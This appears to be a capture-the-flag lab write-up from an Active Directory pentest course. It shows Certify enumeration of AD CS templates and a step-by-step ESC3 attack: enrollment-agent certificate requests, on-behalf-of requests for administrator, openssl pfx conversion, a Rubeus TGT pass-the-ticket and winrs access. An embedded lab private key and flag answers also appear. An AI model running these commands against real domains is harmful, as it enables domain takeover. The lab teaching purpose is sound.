Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Computers S-1-5-21-335606122-960912869-3279953914-515
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Users
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 1
Application Policies : Certificate Request Agent
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : CA-Integration
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:16.0839376Now, request an Enrollment Agent Certificate from the template “SmartCardEnrollment-Agent”:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxojp2N0AUOozc6Y76dtfjfC2jRF4Sz+E8hgBQdv7okV5UQzZ
c2Hvksvp4MztIkJlfJHaFZA3xsviP4QEwy5U3NK1oj/moAGQs1P3q2zKuIBo6d0j
j5UnAyT3WpIlbAf96UhPsWIHtNye5BarDm/Y4zyX/99vbo4U6538VCer9+7oa09U
lJiYuIE4rlENXvSEVWFL4uFkrLq3IvAFNuuuq6eV4On2C69pzHmidFx9N/3kZ/g+
YkncWq5K/aymAQ9x2k1qhD4yAO/pmWxMK0rQ/GhVvkEhZ9D4dtoSnd671m/Db8er
FOC+EAWTa4JNm85QS+nPD4jX8+hwe7jC47rhzQIDAQABAoIBAB/nuMzlFzvpp0Ma
n95BJuYEnRGmkRJmrtLJEMqos5OsXoar7fYg8wNASeGajTFIQk72kXmNp6kG8uEK
Mkm7lF+4bQAaDNIB7mMjR1YBMcLcv/91TlWwvog+1JF1kxX9YsyulkAHZP2nxtEY
43x6dPxvrG2uVpYJt0r2JKrRhU1eioEoQKWPa/L+C1ENyMeJqASH90+UEB2Zq+0h
5NajikKhuGYrV5W8frJe6M2IGOsx4GZxyZlGuUQrmLSaeU0Auqhn8scJErHW+QXI
YOo20yM8MPiUcG+tr1KrFoYyItjxrixgMLxa/x4n/AEFUWRAgRzqiMKGFLfiWY7S
tVd1JnECgYEA/RsCUAMRdb09sY4m1qwyjWx6dSTAI3tGXXMxlTwIHiGSuzuWmVSf
06+W+hZ9b9jXv01DLfDaTjVn81+GsGW0nc35SbD5cTvu68Aet2wYtNKOp6I+jJvC
Koqwbu/Lcpv1TOQgIwzoVwNJ9qaRI7dkYl0PP9GXW2QSIiQtbgPRFGsCgYEAyM4k
uMjAXfCeFnX9ccfL/V7vsLzhk/2Wu1T8hJROAcGyMRVvaxQbDHddeeGXuZQq0lsd
rhJW5RgH5qJyPJh8YUrIVb3h1KFgydBS9dBpTWhiR5zmQ2oyBmcxriY7g0uswEqN
QMAHSoi4QQ8xFKiSonMwXuTpPZuf0tWkUKQnsKcCgYEA0KBms5UT2zz1kVle4ixm
LvRvrAdy6MxAH99Hy38EIfIChJqFdDWw2Egv5kyLcJoInAMPkNqq1zRmTtE6sEPl
MP4KsZdSxOdl9KUTrJVJeCLmu36cmEH7Nh3DeG3oALxU4eBYLQwCp1ZqrQh3Mj2E
XR/f5fbZD9fYqpOvbrNur6kCgYBMCgvL0XFO4Vvr43g6ys7LPlUDlzLQqJmYjKEm
z0YO0jtY7OYJJU7s1JKYIb4jryDcEVbW4Oj4zbXIN0GNAq0u5nOgTEwlCYsuQO35
WZdWka2NsrNbWe5hkFg2uxGUMWbUVibRGyZnqggj0s3iJceJLpdlh8du5eyKmQ4k
31SMRwKBgQDQ8mNY/xjo1WmQj3L/Iw64kZUk4Yu+gYbo9LWnXHh2C8RagK4Hb+OR
k50VBvR4K9eMZiOXWTDkjCxrL9yLYXNsJSvjidxiUlaZoJjrTLAvrOhxJzZxB+G5
OiftF8Z2LyXiXXceY06zg5FPH9vDIzcXwOBdU26cWzwTyTViWOeKGQ==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGNDCCBRygAwIBAgITFQAAAC5uar2JfnC4kwAAAAAALjANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNTA1MjAx
OTQwNDVaFw0yNzA1MjAxOTUwNDVaMFoxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEOMAwGA1UEAxMFVXNlcnMxFjAUBgNV
BAMTDUFkbWluaXN0cmF0b3IwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDGiOnY3QBQ6jNzpjvp21+N8LaNEXhLP4TyGAFB2/uiRXlRDNlzYe+Sy+ngzO0i
QmV8kdoVkDfGy+I/hATDLlTc0rWiP+agAZCzU/erbMq4gGjp3SOPlScDJPdakiVs
B/3pSE+xYge03J7kFqsOb9jjPJf/329ujhTrnfxUJ6v37uhrT1SUmJi4gTiuUQ1e
9IRVYUvi4WSsurci8AU2666rp5Xg6fYLr2nMeaJ0XH03/eRn+D5iSdxarkr9rKYB
D3HaTWqEPjIA7+mZbEwrStD8aFW+QSFn0Ph22hKd3rvWb8Nvx6sU4L4QBZNrgk2b
zlBL6c8PiNfz6HB7uMLjuuHNAgMBAAGjggL5MIIC9TA8BgkrBgEEAYI3FQcELzAt
BiUrBgEEAYI3FQiF4ahyh8yfaOGHJoKfrlGC8vZ9gT+C4d18ue0NAgFkAgEFMBUG
A1UdJQQOMAwGCisGAQQBgjcUAgEwDgYDVR0PAQH/BAQDAgeAMB0GCSsGAQQBgjcV
CgQQMA4wDAYKKwYBBAGCNxQCATAdBgNVHQ4EFgQUN3UaAOsQSs/cvp8j12zjk87H
1bEwHwYDVR0jBBgwFoAU0f6NCqf6tDKfNvwguPfLnmjFRe0wgdgGA1UdHwSB0DCB
zTCByqCBx6CBxIaBwWxkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENO
PW1jb3JwLWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1T
ZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1sb2NhbD9j
ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz
dHJpYnV0aW9uUG9pbnQwgcsGCCsGAQUFBwEBBIG+MIG7MIG4BggrBgEFBQcwAoaB
q2xkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPUFJQSxDTj1QdWJs
aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
LERDPW1vbmV5Y29ycCxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0
Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA4BgNVHREEMTAvoC0GCisGAQQB
gjcUAgOgHwwdQWRtaW5pc3RyYXRvckBtb25leWNvcnAubG9jYWwwTAYJKwYBBAGC
NxkCBD8wPaA7BgorBgEEAYI3GQIBoC0EK1MtMS01LTIxLTMzNTYwNjEyMi05NjA5
MTI4NjktMzI3OTk1MzkxNC01MDAwDQYJKoZIhvcNAQELBQADggEBAMjLc1ngzFE0
7NH8te5NkBbkNedYAGob6attq2j71ykunUd0f1Rk7TvY4EyZZQ2GUUh6mBiNZg5W
hcqO5znSl6ZCS88od4drkYC/YY0fSqy8gZvwsb9d6cM2cpfleHb3M/mf7Y9wCiGg
oU9Zk3UVcTQcDaa1SWYMWGrd2oSlQFAYSJVho9HNZEAEt7Rb2mYUor3nqSy7N81h
Ex12yW8GARPzuv3lAKpK3KVEZ5k3b1fhKtGhl7CgvnG+q5MC1pvu6B3tw9MB5og6
6kL6rfT1he+RtR2m0EcS2SwV0Ase1ELKsFgYaWZQ/VquipfwRlxc6pMAV/zeKWQ/
q1dOfrm8egg=
-----END CERTIFICATE-----Like earlier, save the certificate text to esc3.pem and convert to pfx. Let’s keep using SecretPass@123 as the export password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfxNow we can use the Enrollment Agent Certificate to request a certificate for DA from the template SmartCardEnrollment-Users:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123Once again, save the certificate text to esc3-DA.pem and convert the pem to pfx. Still using SecretPass@123 as the export password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-DA.pfxUse the esc3-DA created above with Rubeus to request a TGT for DA
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /pttCheck if we actually have DA privileges now:
winrs -r:dcorp-dc cmd /c set username
To escalate to Enterprise Admin, we just need to make changes to request to the SmartCardEnrollmentUsers template and Rubeus.
Please note that we are using ‘/onbehalfof: mcorp\administrator’ here:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123
Convert the pem to esc3-DA.pfx using openssl and use the pfx with Rubeus:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-DA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /pttFinally, access mcorp-dc!
winrs -r:mcorp-dc cmd /c set usernameC:\AD\Tools>winrs -r:mcorp-dc cmd /c set username
mcorp\administratorFlag 33 [dcorp-dc] – Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT 🚩
Using C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject command we can see the Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT is: HTTPSCertificates
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure EmailFlag 34 [dcorp-dc] – Name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users 🚩
The name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users is: SmartCardEnrollment-Agent
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request AgentFlag 35 [dcorp-dc] – Name of the CA attribute that allows requestor to provide Subject Alternative Names 🚩
The name of the CA attribute that allows requestor to provide Subject Alternative Names is: EDITF_ATTRIBUTESUBJECTALTNAME2
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!Flag 36 [dcorp-dc] – Name of the group that has enrollment rights on the CA-Integration template 🚩
Using Certify.exe find command we can see the group that has enrollment rights on the CA-Integration template
